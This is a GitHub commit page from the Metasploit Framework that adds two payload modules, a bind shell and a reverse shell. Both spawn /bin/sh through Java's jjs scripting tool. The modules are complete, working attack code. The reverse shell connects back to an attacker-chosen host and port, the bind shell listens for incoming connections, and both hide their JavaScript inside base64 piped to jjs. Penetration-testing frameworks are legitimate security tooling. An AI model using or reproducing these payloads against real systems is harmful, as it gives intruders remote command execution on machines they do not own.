Skip to content

Commit

Permalink
Land #12544, Add bind/reverse jjs unix cmd payloads
Browse files Browse the repository at this point in the history
Merge branch 'land-12544' into upstream-master
  • Loading branch information
bwatters-r7 authored and msjenkins-r7 committed Nov 20, 2019
1 parent 5c4f3fe commit 0295d98
Show file tree
Hide file tree
Showing 2 changed files with 147 additions and 0 deletions.
73 changes: 73 additions & 0 deletions modules/payloads/singles/cmd/unix/bind_jjs.rb
@@ -0,0 +1,73 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

CachedSize = :dynamic

include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via jjs)',
'Description' => 'Listen for a connection and spawn a command shell via jjs',
'Author' => [
'conerpirate', # jjs bind shell
'bcoles' # metasploit
],
'References' => [
['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jjs',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
register_options [
OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
]
end

def generate
return super + command_string
end

def command_string
jcode = %Q{
var ss=new java.net.ServerSocket(#{datastore['LPORT']});
while(true){
var s=ss.accept();
var p=new java.lang.ProcessBuilder("#{datastore['SHELL']}").redirectErrorStream(true).start();
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();
po.flush();
java.lang.Thread.sleep(50);
try{p.exitValue();break;}catch(e){}
};
p.destroy();s.close();ss.close();
}
}

minified = jcode.split("\n").map(&:lstrip).join

%Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
end
end
74 changes: 74 additions & 0 deletions modules/payloads/singles/cmd/unix/reverse_jjs.rb
@@ -0,0 +1,74 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

CachedSize = :dynamic

include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via jjs)',
'Description' => 'Connect back and create a command shell via jjs',
'Author' => [
'conerpirate', # jjs reverse shell
'bcoles' # metasploit
],
'References' => [
['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'jjs',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
register_options [
OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
]
end

def generate
return super + command_string
end

def command_string
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)

jcode = %Q{
var ProcessBuilder=Java.type("java.lang.ProcessBuilder");
var p=new ProcessBuilder("#{datastore['SHELL']}").redirectErrorStream(true).start();
var ss=Java.type("java.net.Socket");
var s=new ss("#{lhost}",#{datastore['LPORT']});
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();
po.flush();
Java.type("java.lang.Thread").sleep(50);
try{p.exitValue();break;}catch(e){}
};
p.destroy();s.close();
}
minified = jcode.split("\n").map(&:lstrip).join

%Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
end
end

0 comments on commit 0295d98

Please sign in to comment.